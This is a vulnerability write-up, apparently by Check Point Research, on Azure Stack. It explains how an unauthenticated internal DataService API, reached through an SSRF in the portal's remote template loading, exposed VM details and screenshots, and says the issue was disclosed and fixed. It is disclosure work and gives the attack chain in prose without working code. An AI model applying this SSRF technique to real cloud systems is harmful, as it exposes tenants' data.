Remote Cloud Execution – Critical Vulnerabilities in Azure Cloud Infrastructure (Part I)

Ronen Shustin

Cloud Attack Part I

Motivation

Cloud security is like voodoo. Clients blindly trust the cloud providers and the security they provide. If we look at popular cloud vulnerabilities, we see that most of them focus on the security of the client’s applications (aka misconfigurations or vulnerable applications), and not the cloud provider infrastructure itself. We wanted to disprove the assumption that cloud infrastructures are secure. In this part, we demonstrate various attack vectors and vulnerabilities we found on Azure Stack.

Check Point Research informed Microsoft Security Response Center about the vulnerabilities exposed in this research and

a solution was responsibly deployed to ensure its users can safely continue using Azure Stack

Setting up a research environment

Researching cloud components can be difficult, particularly as most of the time it’s “black box” research. Fortunately, Microsoft has an on-premise Azure environment called Azure Stack which is meant primarily for enterprise usage. There is also a version called Azure Stack Development Kit (ASDK) which is free. All you have to do is get a single server that meets the installation hardware requirements and follow the detailed installation guides. Once the installation is finished, you will be greeted with the User/Admin Portal, which looks very similar to the Azure Portal:

By default, ASDK comes with a small set of features (core components) which can be extended with features like SQL Providers, App Service and more. With that said, let’s see how ASDK compares to Azure.

Main differences between Azure and ASDK

Scalability ASDK runs on a single instance with limited resources and all of its roles run as separate VMs handled by Hyper-V. This causes some internal architectural differences.



ASDK doesn’t run the latest software as Azure does, but is a couple of versions behind.

Compared to Azure, ASDK has a very limited number of features.

Azure Stack Overview

Note – Most of the data in this section is taken from this book

Let’s break down the diagram by layers:

First, we have the Azure Stack portal that provides a simple and accessible UI, along with Templates, PowerShell, etc. These components are used for deploying and managing resources and are the common interfaces in Azure Stack. They are built on top of and interact with the Azure Resource Manager (ARM). The ARM decides which requests it can handle and which need to be passed on to another layer.

The partition request broker includes core resource providers in Azure Stack. Each resource provider has an API that works back and forth with the ARM layer. A resource provider is what allows you to communicate with the underlying layer, and includes a user/admin extensions that are accessible from the portal.

The next layer underneath contains the infrastructure controllers which communicate with the infrastructure roles. This layer has a set of internal APIs which are not exposed to the user.

The infrastructure roles are responsible for tasks such as computing, networking, storage and more.

Finally, the infrastructure roles contain all the management components of Azure Stack, interacting with the underlying hardware layer to abstract hardware features into high-level software services that Azure Stack provides.

ASDK is based on Hyper-V, meaning all of its roles run as separate virtual machines on the host server. The infrastructure has separate virtual networks that isolate them from the host network.

By default, there are several infrastructure roles that are deployed, including:

Name Description AzS-ACS01 Azure Stack storage services. AzS-ADFS01 Active Directory Federation Services (ADFS). AzS-CA01 Certificate authority services for Azure Stack role services. AzS-DC01 Active Directory, DNS, and DHCP services for Microsoft Azure Stack. AzS-ERCS01 Emergency Recovery Console VM. AzS-GWY01 Edge gateway services such as VPN site-to-site connections for tenant networks. AzS-NC01 Network Controller, which manages Azure Stack network services. AzS-SLB01 Load balancing multiplexer services in Azure Stack for both tenants and Azure Stack infrastructure services. AzS-SQL01 Internal data store for Azure Stack infrastructure roles. AzS-WAS01 Azure Stack administrative portal and Azure Resource Manager services. AzS-WASP01 Azure Stack user (tenant) portal and Azure Resource Manager services. AzS-XRP01 Infrastructure management controller for Microsoft Azure Stack, including the Compute, Network, and Storage resource providers.

Source: https://docs.microsoft.com/en-us/azure-stack/asdk/asdk-architecture

If we break down the main abstract layers in the diagram above into the main virtual machines:

ARM Layer: AzS-WAS01, AzS-WASP01

RP Layer + Infrastructure Control Layer: AzS-XRP01

Let’s look at an example that demonstrates how all the abstract layers in the diagram work together:

A tenant wants to stop a virtual machine in Azure Stack. How does this work?

The tenant can use the User Portal/CLI/Powershell to perform this action. All these interfaces eventually send an HTTP request which describes the desired action to the ARM (Azure Resource Manager), which runs on Azs-WASP01. The ARM performs its necessary checks (for example, check if the wanted resource exists, or if it belongs to the tenant), and tries to perform the action. There are actions the ARM can’t handle by itself, like compute, storage and more. Therefore, it forwards the request with additional parameters to the correct resource providers which handles the virtual machine compute operations (which runs on Azs-XRP01). There is an internal chain of API requests until eventually the virtual machine located in the Hyper-V cluster is shut down. The result is forwarded back in the request chain to the tenant.

In the following section, we describe in detail an issue we found in one of the internal services that allowed us to grab screenshots of the tenant and infrastructure machines.

Screenshot grabbing and information disclosure

Service Fabric Explorer is a web tool pre-installed in the machine that takes the role of the RP and Infrastructure Control Layer (AzS-XRP01). This enables us to view the internal services which are built as Service Fabric Applications (located in the RP Layer).

When we tried to access the URLs of the services from the Service Fabric Explorer, we noticed that some of them don’t require authentication (usually there is a certificate authentication/HTTP Authentication).

We had some questions:

Why don’t these services require authentication?

What API do they expose?

These services are written in C# and their source code is not public, so we had to use a decompiler to research them. This required us to understand the structure of the Service Fabric applications.

One particular service that didn’t require authentication is called “DataService”. Our first task was to find where this service is located on the Azs-XRP01 machine. We found this easily by running a WMI query to list the running processes:

The result revealed the location of all the service fabric services there are on the machine, including DataService. Performing a directory listing on the DataService code folder revealed a lot of DLLs. However, their names indicate their purpose:

De-compiling the DLLs gave us the ability to explore the code and find the mapping for the API HTTP routes:

We can see that if the HTTP URI matches to one of the route templates, the request is handled by a specific controller, which is a common REST API implementation. Most of the route templates require at least one parameter that we don’t necessarily know. Therefore, we first started looking at those that don’t require additional parameters:

QueryVirtualMachineInstanceView

QueryClusterInstanceView

As Azure Stack runs locally on our machine, we can just locally browse these API to see how they respond.

When accessing the virtualMachines/allocation API ( QueryVirtualMachineInstanceView ), it returns a large XML/JSON file (depending on the Accept header you send) which contains a lot of data about infrastructure/tenant machines located on the Hyper-V node in the cluster.

This is a snippet from the information returned. We can see here interesting stuff like the virtual machine name and ID, hardware information like cores, total memory, etc.

Now that we know there is an API that can provide information about the infrastructure/tenant machines, we can look at the API calls that require other parameters. For example, the VirtualMachineScreenshot looks interesting, so let’s see how it works.

According to the template, several parameters must be supplied to route the request through the VirtualMachineScreenshot controller:

virtualMachineId – The ID of the machine on which we want to invoke the operation. The ID is provided by the QueryVirtualMachineInstanceView API call.

heightPixels, widthPixels – The dimensions of the screenshot.

When all of these parameters are provided, the GetVirtualMachineScreenshot function is invoked:

If the virtual machine ID is valid and exists, the GetVmScreenshot function is called. This actually “proxies” the request into another internal service.

We can see that it creates a new request with the specified parameters and passes it to the request executor. The internal service which will process this request is called “Compute Cluster Manager” (located in the Infrastructure Control Layer). From its name, we see that it manages the compute clusters, and can perform relevant actions. Let’s see how this service handles the screenshot request:

First, we encounter this wrapper function, which calls another GetVmScreenshot on the vmScreenshotCollector instance. However, we can see that there is a new parameter, a flag that determines if the compute cluster contains only a single host/node.

After GetVirtualMachineOwnerNode figures out which node of the cluster the virtual machine is located on, it calls the GetVmThumbnail function:

It seems like this function constructs a remote Powershell command which it executes on the compute node (this is how most of the compute operations work). Let’s look at the compute node and see how the Get-CpiVmThumbnail is implemented:

This is the Powershell implementation of this function. It looks like it executes the GetVirtualSystemthumbnailImage which is a Hyper-V WMI call that grabs the thumbnail for the virtual machine. The thumbnail is the small window at the bottom left of the machine overview in Hyper-V:

However, because of the option to specify dimensions, this is equivalent to a legit quality screenshot.

Now that we have a good understanding of the primitives contained in “DataService”, let’s get back to our first question: Why doesn’t it require authentication? We actually don’t know the answer, but it should absolutely require authentication. We approached this by asking an additional question: In what scenario can we access this service from outside? The answer is SSRF, but where should we start looking? The obvious choice is the User Portal. It is accessible to the tenants and can access services such as ARM. On Azure Stack, it can even directly access the internal services.

Azure Stack and Azure can deploy resources from a template. The template can be loaded from a local file, or a remote URL. It is a very simple feature and also interesting in terms of SSRF, because it sends a GET request to a URL to retrieve data. This is the implementation of the remote template loading (used as Ajax):

The GetStringAsync function sends an HTTP GET request to the templateUri and returns the data as JSON. There is no validation on whether the host is internal or external (and it supports IPv6). Therefore, this method is a perfect candidate for SSRF. Although this allows only GET requests, as we’ve seen above, it’s sufficient for accessing the DataService.

So let’s use an example. We want to get a screenshot from a machine whose ID is f6789665-5e37-45b8-96d9-7d7d55b59be6 with the 800×600 dimensions:

The response we got is Base64 encoded raw image data.

We can now take the data we got and transform it into an actual image. Here is an example using powershell:

We will get this image:

Conclusion

In this part, we showed how a small logical bug can sometimes be leveraged into a serious issue. In our case, because DataService didn’t require authentication, this eventually allowed us to get screenshots and information about tenants and infrastructure machines.

In the second part, we will take a deep dive into Azure App Service internals and examine its architecture, attack vectors, and demonstrate how a critical vulnerability we found in one of its components affected Azure Cloud.

The SSRF vulnerability (CVE-2019-1234) was disclosed and fixed by Microsoft, and was awarded $5,000 from Microsoft’s bug bounty program.

The unauthenticated internal API issue had also been separately discovered by Microsoft, and had been addressed in late 2018 in Azure Stack 1811 update.

In the next part, we disclose a critical vulnerability we found in the Azure App Service.